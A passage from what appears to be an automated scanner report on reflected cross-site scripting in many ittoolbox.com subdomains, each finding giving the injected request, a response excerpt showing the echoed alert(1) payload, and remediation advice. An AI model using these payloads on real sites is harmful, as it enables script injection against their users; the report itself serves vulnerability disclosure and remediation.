This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?840b5"style%3d"x%3aexpression(alert(1))"4766cc8d795=1 HTTP/1.1
Host: cloud.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 56254
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=d10qzl45hht5qz23fp4nsrfn; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Toolbox for
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://cloud.ittoolbox.com/Default.aspx?840b5"style="x:expression(alert(1))"4766cc8d795=1" />
...[SNIP]...

3.11. http://cloud.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cloud.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbf1a'-alert(1)-'3dbc9db0889 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cbf1a'-alert(1)-'3dbc9db0889=1 HTTP/1.1
Host: cloud.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 56139
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ywt53055nfjnwtydrpoywn55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Toolbox for
...[SNIP]...
der != null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fcloud.ittoolbox.com%2fDefault.aspx%3fcbf1a'-alert(1)-'3dbc9db0889%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.12. http://crm.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://crm.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ce50'-alert(1)-'dab597dca86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?3ce50'-alert(1)-'dab597dca86=1 HTTP/1.1
Host: crm.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 82857
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rof0n4454b3qd145w4ffjfy5; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   CRM Communi
...[SNIP]...
ender != null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fcrm.ittoolbox.com%2fDefault.aspx%3f3ce50'-alert(1)-'dab597dca86%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.13. http://crm.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://crm.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f2fb"style%3d"x%3aexpression(alert(1))"9153b50ea5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1f2fb"style="x:expression(alert(1))"9153b50ea5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?1f2fb"style%3d"x%3aexpression(alert(1))"9153b50ea5c=1 HTTP/1.1
Host: crm.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 82972
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kh14sz45wwtcvn45mjmtr5jk; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   CRM Communi
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://crm.ittoolbox.com/Default.aspx?1f2fb"style="x:expression(alert(1))"9153b50ea5c=1" />
...[SNIP]...

3.14. http://database.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://database.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10760'-alert(1)-'13abc61113d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?10760'-alert(1)-'13abc61113d=1 HTTP/1.1
Host: database.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 84461
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=grg3kuniuerjaqukc1lgab2q; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Database Co
...[SNIP]...
!= null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fdatabase.ittoolbox.com%2fDefault.aspx%3f10760'-alert(1)-'13abc61113d%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.15. http://database.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://database.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d8f9"style%3d"x%3aexpression(alert(1))"e81cd8e67a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2d8f9"style="x:expression(alert(1))"e81cd8e67a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?2d8f9"style%3d"x%3aexpression(alert(1))"e81cd8e67a9=1 HTTP/1.1
Host: database.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 84576
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=s0rz452oux01im550lr1ro55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Database Co
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://database.ittoolbox.com/Default.aspx?2d8f9"style="x:expression(alert(1))"e81cd8e67a9=1" />
...[SNIP]...

3.16. http://datacenter.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://datacenter.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fd5c'-alert(1)-'2d188aeb228 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?4fd5c'-alert(1)-'2d188aeb228=1 HTTP/1.1
Host: datacenter.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60222
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=csuufpaquxzkzzujtoqiao45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Toolbox for
...[SNIP]...
= null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fdatacenter.ittoolbox.com%2fDefault.aspx%3f4fd5c'-alert(1)-'2d188aeb228%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.17. http://datacenter.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://datacenter.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f7da"style%3d"x%3aexpression(alert(1))"17a38cf4d4d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f7da"style="x:expression(alert(1))"17a38cf4d4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?9f7da"style%3d"x%3aexpression(alert(1))"17a38cf4d4d=1 HTTP/1.1
Host: datacenter.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60337
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mpr5s355sxundw45kg2fxj45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Toolbox for
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://datacenter.ittoolbox.com/Default.aspx?9f7da"style="x:expression(alert(1))"17a38cf4d4d=1" />
...[SNIP]...

3.18. http://datawarehouse.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://datawarehouse.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 847b0'-alert(1)-'3ab80a43f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?847b0'-alert(1)-'3ab80a43f3=1 HTTP/1.1
Host: datawarehouse.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72922
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=anqptn3s0wuprm45uhnmglnm; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Data Wareho
...[SNIP]...
ull && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fdatawarehouse.ittoolbox.com%2fDefault.aspx%3f847b0'-alert(1)-'3ab80a43f3%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.19. http://datawarehouse.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://datawarehouse.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32b24"style%3d"x%3aexpression(alert(1))"ecbb8c34bb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 32b24"style="x:expression(alert(1))"ecbb8c34bb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?32b24"style%3d"x%3aexpression(alert(1))"ecbb8c34bb4=1 HTTP/1.1
Host: datawarehouse.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73038
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=tpkduff0fvaf5henlcqp5u55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Data Wareho
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://datawarehouse.ittoolbox.com/Default.aspx?32b24"style="x:expression(alert(1))"ecbb8c34bb4=1" />
...[SNIP]...

3.20. http://eai.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://eai.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aedaa'-alert(1)-'0d3480e5fd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aedaa'-alert(1)-'0d3480e5fd0=1 HTTP/1.1
Host: eai.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71748
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=x0s41gvyw1hlstmc0cbyhtax; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   EAI Communi
...[SNIP]...
ender != null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2feai.ittoolbox.com%2fDefault.aspx%3faedaa'-alert(1)-'0d3480e5fd0%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.21. http://eai.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://eai.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13b20"style%3d"x%3aexpression(alert(1))"5f3efe7bb8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 13b20"style="x:expression(alert(1))"5f3efe7bb8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?13b20"style%3d"x%3aexpression(alert(1))"5f3efe7bb8b=1 HTTP/1.1
Host: eai.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71865
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rjzukq4535sibbfa3mbwsqne; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   EAI Communi
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://eai.ittoolbox.com/Default.aspx?13b20"style="x:expression(alert(1))"5f3efe7bb8b=1" />
...[SNIP]...

3.22. http://emergingtech.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://emergingtech.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 624cf'-alert(1)-'f8004f9ed87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?624cf'-alert(1)-'f8004f9ed87=1 HTTP/1.1
Host: emergingtech.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47707
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ktnnm045tqcaqz45m5u3obqr; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Emerging Te
...[SNIP]...
null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2femergingtech.ittoolbox.com%2fDefault.aspx%3f624cf'-alert(1)-'f8004f9ed87%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.23. http://emergingtech.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://emergingtech.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6897"style%3d"x%3aexpression(alert(1))"04e25a4b71d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6897"style="x:expression(alert(1))"04e25a4b71d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?c6897"style%3d"x%3aexpression(alert(1))"04e25a4b71d=1 HTTP/1.1
Host: emergingtech.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47822
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=m5xm52bdiwgi1b454avwfk45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Emerging Te
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://emergingtech.ittoolbox.com/Default.aspx?c6897"style="x:expression(alert(1))"04e25a4b71d=1" />
...[SNIP]...

3.24. http://erp.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://erp.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b536f"style%3d"x%3aexpression(alert(1))"9e5bf1e52b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b536f"style="x:expression(alert(1))"9e5bf1e52b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?b536f"style%3d"x%3aexpression(alert(1))"9e5bf1e52b9=1 HTTP/1.1
Host: erp.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 74874
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uzdvbjavj2zyvp550xl533uo; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   ERP Communi
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://erp.ittoolbox.com/Default.aspx?b536f"style="x:expression(alert(1))"9e5bf1e52b9=1" />
...[SNIP]...

3.25. http://erp.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://erp.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e573'-alert(1)-'1b04ac79209 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?6e573'-alert(1)-'1b04ac79209=1 HTTP/1.1
Host: erp.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 74757
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=05bm4jvm03f05leelbecgtvo; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   ERP Communi
...[SNIP]...
ender != null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2ferp.ittoolbox.com%2fDefault.aspx%3f6e573'-alert(1)-'1b04ac79209%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.26. http://hardware.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hardware.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a39f'-alert(1)-'bbb340ffdfa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request
